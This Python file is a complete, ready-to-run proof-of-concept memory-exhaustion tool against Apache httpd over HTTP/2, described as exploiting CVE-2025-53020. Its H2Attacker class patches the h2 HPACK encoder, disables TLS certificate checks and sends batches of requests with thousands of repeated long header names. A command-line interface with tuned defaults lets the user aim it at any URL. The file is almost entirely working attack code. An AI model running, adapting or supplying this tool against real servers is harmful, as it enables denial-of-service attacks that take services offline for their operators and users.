import h2.connection import socket import time import tqdm import argparse import ssl from urllib.parse import urlparse import struct class H2Attacker: """HTTP/2 client for testing memory exhaustion vulnerabilities in Apache httpd.""" def __init__(self, url): """Initialize the attacker with target URL. Args: url (str): Target URL (e.g., 'https://example.com/path') """ parsed_url = urlparse(url) self.protocol = parsed_url.scheme self.host = parsed_url.hostname self.port = parsed_url.port or (443 if self.protocol == 'https' else 80) self.path = parsed_url.path or '/' # Validate required components if not self.host: raise ValueError(f"Invalid URL: {url}. Host is required.") # Connection objects self.socket = None self.http2_connection = None # Create pseudo headers from URL components self.pseudo_headers = self._create_pseudo_headers() self.default_headers = self.pseudo_headers.copy() def _create_pseudo_headers(self): """Create HTTP/2 pseudo headers from URL components. Returns: list: List of pseudo header tuples """ return [ (':method', 'GET'), (':path', self.path), (':authority', self.host), (':scheme', self.protocol) ] def connect(self): """Establish HTTP/2 connection to the target server.""" try: # Create socket connection self.socket = socket.create_connection((self.host, self.port)) # Set SO_LINGER to 5 seconds to ensure graceful shutdown with FIN self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 5)) # Setup TLS if HTTPS if self.protocol == 'https': self._setup_tls() # Initialize HTTP/2 connection self.http2_connection = h2.connection.H2Connection() self.http2_connection.initiate_connection() self.socket.sendall(self.http2_connection.data_to_send()) # Apply the encoder patch for empty values self._patch_encoder_for_empty_values() except Exception as e: raise ConnectionError(f"Failed to connect to {self.host}:{self.port}: {e}") def _setup_tls(self): """Setup TLS connection with HTTP/2 ALPN.""" context = ssl.create_default_context() context.check_hostname = False context.verify_mode = ssl.CERT_NONE # Set ALPN to negotiate HTTP/2 context.set_alpn_protocols(['h2']) # Wrap socket with TLS self.socket = context.wrap_socket(self.socket, server_hostname=self.host) # Ensure SSL handshake completes self.socket.do_handshake() def _patch_encoder_for_empty_values(self): """Patch the h2 encoder to fix empty value indexing bug.""" if not self.http2_connection: raise RuntimeError("HTTP/2 connection not established") original_add = self.http2_connection.encoder.add def patched_add(to_add, sensitive, huffman=False): name, value = to_add # Set indexing mode indexbit = b'\x40' if not sensitive else b'\x10' # INDEX_INCREMENTAL or INDEX_NEVER # Search for matching header match = self.http2_connection.encoder.header_table.search(name, value) if match is None: # Not in table - use original logic return original_add(to_add, sensitive, huffman) # Header is in table index, found_name, found_value = match # Fix: Check if found_value is not None (perfect match) instead of truthy if found_value is not None: # Perfect match - use indexed encoding return self.http2_connection.encoder._encode_indexed(index) else: # Name-only match - use indexed literal encoded = self.http2_connection.encoder._encode_indexed_literal( index, value, indexbit, huffman ) if not sensitive: self.http2_connection.encoder.header_table.add(name, value) return encoded # Replace the add method self.http2_connection.encoder.add = patched_add def set_default_headers(self, additional_headers): """Set default headers by combining pseudo headers with additional headers. Args: additional_headers (list): List of additional header tuples """ self.default_headers = self.pseudo_headers + additional_headers def send_headers(self, headers, add_pseudo_headers=True): """Send HTTP/2 headers for a single request. Args: headers (list): List of header tuples add_pseudo_headers (bool): Whether to prepend pseudo headers """ if not self.http2_connection: raise RuntimeError("HTTP/2 connection not established") if add_pseudo_headers: headers = self.pseudo_headers + headers stream_id = self.http2_connection.get_next_available_stream_id() self.http2_connection.send_headers(stream_id, headers, end_stream=True) self.socket.sendall(self.http2_connection.data_to_send()) def send_default_headers(self): """Send a request using the default headers.""" if not self.default_headers: raise ValueError("Default headers are not set") self.send_headers(self.default_headers, add_pseudo_headers=False) def add_headers_to_batch(self, headers): """Add headers to batch without sending immediately. Args: headers (list): List of header tuples """ if not self.http2_connection: raise RuntimeError("HTTP/2 connection not established") stream_id = self.http2_connection.get_next_available_stream_id() self.http2_connection.send_headers(stream_id, headers, end_stream=False) def send_batch(self): """Send all batched headers.""" if not self.http2_connection: raise RuntimeError("HTTP/2 connection not established") self.socket.sendall(self.http2_connection.data_to_send()) @staticmethod def create_repeated_header_name_headers(header_name_length=4000, header_reps=1000, char_to_repeat='a'): """Create headers with repeated long header names. Args: header_name_length (int): Length of the header name header_reps (int): Number of times to repeat the header char_to_repeat (str): Character to use for the header name Returns: list: List of header tuples with repeated long names """ header_name = char_to_repeat * header_name_length return [(header_name, '')] * header_reps def run_attack_with_headers(self, headers, requests_per_batch, num_batches, delay_between_batches=0): """Run the memory exhaustion attack with specified headers. Args: headers (list): Headers to use for the attack requests_per_batch (int): Number of requests to send per batch num_batches (int): Number of batches to send delay_between_batches (float): Delay in seconds between batches """ print(f"Starting attack: {num_batches} batches of {requests_per_batch} requests each") for _ in tqdm.tqdm(range(num_batches), desc="Sending batches"): for _ in range(requests_per_batch): self.add_headers_to_batch(headers) self.send_batch() if delay_between_batches > 0: time.sleep(delay_between_batches) def run_attack_with_default_headers(self, requests_per_batch, num_batches, delay_between_batches=0): """Run attack using the default headers. Args: requests_per_batch (int): Number of requests to send per batch num_batches (int): Number of batches to send delay_between_batches (float): Delay in seconds between batches """ self.run_attack_with_headers( self.default_headers, requests_per_batch, num_batches, delay_between_batches ) def run_memory_exhaustion_attack(url, header_name_length, header_reps, requests_per_batch, num_batches, delay_between_batches=0, num_headers_to_repeat=1): """Run the memory exhaustion attack against Apache httpd. Args: url (str): Target URL header_name_length (int): Length of repeated header names header_reps (int): Number of header repetitions per request requests_per_batch (int): Number of requests per batch num_batches (int): Number of batches to send delay_between_batches (float): Delay between batches in seconds num_headers_to_repeat (int): Number of different header names to create using different characters """ print(f"Targeting: {url}") print(f"Header name length: {header_name_length}") print(f"Header repetitions: {header_reps}") print(f"Number of different header names: {num_headers_to_repeat}") # Initialize attacker attacker = H2Attacker(url) attacker.connect() # First, send an initial request to add the header to HPACK table print("Sending initial request to populate HPACK table...") initial_headers = H2Attacker.create_repeated_header_name_headers( header_name_length=header_name_length, header_reps=1 ) attacker.send_headers(initial_headers) # Prepare attack headers with different character patterns print("Preparing attack headers...") attack_headers = [] for i in range(num_headers_to_repeat): char = chr(ord('a') + i) headers = H2Attacker.create_repeated_header_name_headers( header_name_length=header_name_length, header_reps=header_reps, char_to_repeat=char ) attack_headers.extend(headers) # Set as default headers and run attack attacker.set_default_headers(attack_headers) attacker.run_attack_with_default_headers( requests_per_batch=requests_per_batch, num_batches=num_batches, delay_between_batches=delay_between_batches ) print("Attack completed. Waiting for server response...") time.sleep(5) def main(): parser = argparse.ArgumentParser( description='''HTTP/2 Memory Exhaustion PoC for Apache httpd This tool exploits CVE-2025-53020 in Apache httpd by sending HTTP/2 requests with repetitive long header names, which takes advantage of unnecessary memory duplication for header names. The attack works by: 1. Creating long header names (--header-name-length) to maximize memory consumption 2. Optionally creating multiple distinct header names (--num-headers-to-repeat) using different characters (a, b, c, etc.) 3. Sending batches of requests (--batches) where: - Each request contains multiple repetitions of the header names (--header-reps) - Multiple requests can be sent per batch (--requests-per-batch) - Optional delays between batches can be configured (--delay) 4. The server allocates memory for each header name occurrence, leading to memory exhaustion Example usage: python poc.py --url https://target.com/api/endpoint python poc.py --url http://localhost:8080/test --header-reps 1000 python poc.py --url https://target.com --num-headers-to-repeat 3 ''', formatter_class=argparse.RawDescriptionHelpFormatter ) parser.add_argument('--url', required=True, help='Target URL (e.g., https://example.com/path)') parser.add_argument('--header-name-length', type=int, default=4064, help='Length of header name (default: 4064)') parser.add_argument('--header-reps', type=int, default=2063, help='Number of header repetitions per request (default: 2063)') parser.add_argument('--requests-per-batch', type=int, default=1, help='Number of requests per batch (default: 1)') parser.add_argument('--batches', type=int, default=100, help='Number of batches (default: 100)') parser.add_argument('--delay', type=float, default=0, help='Delay between batches in seconds (default: 0)') parser.add_argument('--num-headers-to-repeat', type=int, default=1, help='Number of different header names to create (default: 1)') args = parser.parse_args() # If using multiple header names, force requests per batch to 1 if args.num_headers_to_repeat != 1: if args.requests_per_batch != 1: print(f"Warning: When using multiple header names > 1, requests per batch is recommended to be 1") if args.header_name_length > 4000: print(f"ERROR: When using multiple header names > 1, header name length should be less than 4000") return 1 if args.header_name_length > 4064: print(f"ERROR: Header name length should be less than 4064") return 1 if args.header_reps > 2063: print(f"Warning: Header reps should be less than 2063") try: run_memory_exhaustion_attack( url=args.url, header_name_length=args.header_name_length, header_reps=args.header_reps, requests_per_batch=args.requests_per_batch, num_batches=args.batches, delay_between_batches=args.delay, num_headers_to_repeat=args.num_headers_to_repeat ) except Exception as e: print(f"Error: {e}") return 1 return 0 if __name__ == "__main__": exit(main())